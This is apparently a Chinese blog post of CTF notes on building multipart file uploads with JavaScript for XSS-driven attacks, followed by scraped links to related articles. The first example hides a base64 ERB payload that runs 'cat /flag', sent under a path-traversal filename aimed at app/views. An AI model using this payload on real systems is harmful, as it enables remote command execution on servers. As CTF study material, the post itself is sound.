1.用h5对象上传表单(图片)

    var formData = new FormData();

    formData.append("authenticity_token", '1212121212');

    formData.append("file[context]", "zxcvxzcvxzcv");

    var content = 'PCU9IGBjYXQgL2ZsYWcgYCAlPg==';   //这是文件内容的base64

    var blob = new Blob([content], { type: "image/png"});

    formData.append("file[myfile]", blob,"Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="authenticity_token"

1212121212

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[context]"

zxcvxzcvxzcv

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="file[myfile]"; filename="Ly4uLy4uL2FwcC92aWV3cy9ob21lL2FhMzguZXJi"

Content-Type: image/png

PCU9IGBjYXQgL2ZsYWcgYCAlPg==

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryKUQ7zZnBZ9d5xKT2--

1.用h5对象上传表单(txt)

    var formData = new FormData();

    var content = 'testestestes';   //这是文件内容的base64

    var blob = new Blob([content], { type: "text/plain"});

    formData.append("file[myfile]", blob,"haha.txt");  //这里是文件名的base64

    formData.append("commit", 'submit');

    var request = new XMLHttpRequest();

    request.open("POST", "https://xz.aliyun.com/t/3245");

    request.send(formData);

请求体

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="file[myfile]"; filename="haha.txt"

Content-Type: text/plain

testestestes

------WebKitFormBoundaryFcFYtbPnXsiq8yjI

Content-Disposition: form-data; name="commit"

submit

------WebKitFormBoundaryFcFYtbPnXsiq8yjI--

2.使用原生js上传表单数据

通过余弦这个网站辅助生成表单

xhr = function(){

  /*AJAX*/

  var request = false;

  if(window.XMLHttpRequest) {

    request = new XMLHttpRequest();

  } else if(window.ActiveXObject) {

    try {

      request = new window.ActiveXObject('Microsoft.XMLHTTP');

    } catch(e) {}

  }

  return request;

}();

request = function(method,src,argv,content_type){

  xhr.open(method,src,false);

  if(method=='POST')xhr.setRequestHeader('Content-Type',content_type);

  xhr.send(argv);

  return xhr.responseText;

}

attack_a = function(){

  var src = "https://xz.aliyun.com";

  var authenticity_token = "1212121212";

  var file = "zxcvxzcvxzcv";

  var argv_0 = "\r\n";

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"authenticity_token\"\r\n\r\n";

  argv_0 += (authenticity_token+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5\r\nContent-Disposition: form-data; name=\"file\"\r\n\r\n";

  argv_0 += (file+"\r\n");

  argv_0 += "---------------------7964f8dddeb95fc5--\r\n";

  request("POST",src,argv_0,"multipart/form-data; boundary=-------------------7964f8dddeb95fc5");

}

请求体:

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="authenticity_token"

1212121212

---------------------7964f8dddeb95fc5

Content-Disposition: form-data; name="file"

zxcvxzcvxzcv

---------------------7964f8dddeb95fc5--

HCTF share的详解ajax构造表单:

https://xz.aliyun.com/t/3258   xss上传表单

http://sec2hack.com/ctf/sctf2018-web-writeup.html xss获取源码

https://xz.aliyun.com/t/2469#toc-1巅峰极客wp,xss获取图片

ajax上传表单的俩种方式的更多相关文章

  1. 使用ajax上传表单(带文件)

    在使用form表单的时候上传文件+表单,会使得页面跳转,而在某些时候不希望跳转,只变化页面中的局部信息 通过查找资料,可以使用FormData进行ajax操作. FormData介绍:XMLHttpR ...

  2. 使用AJAX异步提交表单的几种方式

    方式一 手工收集所有的用户输入,封装为大的“k1=v1&k2=v2…”键值对形式,使用$.post(url, data,fn)把数据提交给服务器 $.ajax({ type:'post', u ...

  3. 【Flask】 结合wtforms的文件上传表单

    表单中的文件上传 基本的表单渲染,表单类设置等等就不多说了,参看另一个文章即可.但是那篇文章里没有提到对于FileField,也就是上传文件的表单字段是如何处理,后端又是如何实现接受上传过来的文件的. ...

  4. 上传漏洞科普[1]-文件上传表单是Web安全主要威胁

    为了让最终用户将文件上传到您的网站,就像是给危及您的服务器的恶意用户打开了另一扇门.即便如此,在今天的现代互联网的Web应用程序,它是一种 常见的要求,因为它有助于提高您的业务效率.在Facebook ...

  5. bootstrap上传表单的时候上传的数据默认是0 一定要小心

    bootstrap上传表单的时候上传的数据默认是0 一定要小心

  6. JavaScript表单提交四种方式

    总结JavaScript表单提交四种方式 <!DOCTYPE html> <html> <head> <title>JavaScript表单提交四种方式 ...

  7. Ajax提交Form表单的一种方法

    待提交的表单 <form id="updatePublicKey" enctype="multipart/form-data"> <div c ...

  8. C# MVC提交表单的四种方式(转)

    Mvc 提交表单的4种方法全程详解(转) 一,MVC  HtmlHelper方法 Html.BeginForm(actionName,controllerName,method,htmlAttribu ...

  9. 【总结-前台发送后台接收表单】MVC提交表单的四种方式

    https://www.cnblogs.com/chenwolong/p/Form.html#commentform 后台控制器接收前台表单参数三种方法: 一.普通参数 HTML标签name 和参数名 ...

随机推荐

  1. 撩课-MySQL详解1-数据库简介

    学习地址:[撩课-JavaWeb系列1之基础语法-前端基础][撩课-JavaWeb系列2之XML][撩课-JavaWeb系列3之MySQL][撩课-JavaWeb系列4之JDBC][撩课-JavaWe ...

  2. Windows的图形设备接口与Windows绘图

    本次学习目标 理解DC, 映像模式, 坐标系统, 窗口和视口; 学习获取绘图工具(画笔/画刷)的句柄, 设置颜色, 能定义映像模式; 会使用常用的绘图函数. 编写程序: 在屏幕上出现一个圆心沿正弦曲线 ...

  3. 关系型数据库——主键&外键的

    一.什么是主键.外键: 关系型数据库中的一条记录中有若干个属性,若其中某一个属性组(注意是组)能唯一标识一条记录,该属性组就可以成为一个主键  比如   学生表(学号,姓名,性别,班级)  其中每个学 ...

  4. Vue.js简单入门

    这篇文章我们将学习vue.js的基础语法,对于大家学习vue.js具有一定的参考借鉴价值,有需要的朋友们下面来一起看看. Vue.js是一个数据驱动的web界面库.Vue.js只聚焦于视图层,可以很容 ...

  5. pytorch 文本输入处理

    https://blog.csdn.net/nlpuser/article/details/88067167 https://blog.csdn.net/u012436149/article/deta ...

  6. PRINCE2的优势有哪些?

    PRINCE2之所以迅速发展的原因之一是许多企业认识到建立适合自己企业的项目管理标准是一项耗时耗财的工作. 他们至少要花费6-12个月.成千上万个工时来建立一套方法,而这只是最初的成本. 之后他们必须 ...

  7. No value specified for 'Date'错误

    今天使用 BeanUtils.copyProperties(m,n);  遇到  No value specified for 'Date'  这个错误,以前用的时候都不需要加 try 今天使用发现需 ...

  8. 解决linux-mysql 登录时,报异常:Access denied for user 'root'@'localhost'

    版权声明:本文为博主原创文章,未经博主允许不得转载. https://blog.csdn.net/hhj724/article/details/73277506 解决linux-mysql 登录时,报 ...

  9. java 通过调用存储过程获取结果集

    一般在java中,数据查询是通过Statement, PreparedStatement获取结果集,今天向大家介绍通过CallableStatement调用存储过程,从而获取结果集.        本 ...

  10. C# winfrom提示框,点击则不显示,不点击则提示输入内容

    先看下效果图,初次进来是界面左边的效果,点击请输入账号,清除内容,可以直接输入,右边图                            以下代码是失去焦点的,一定要把控件的属性TabStop 改 ...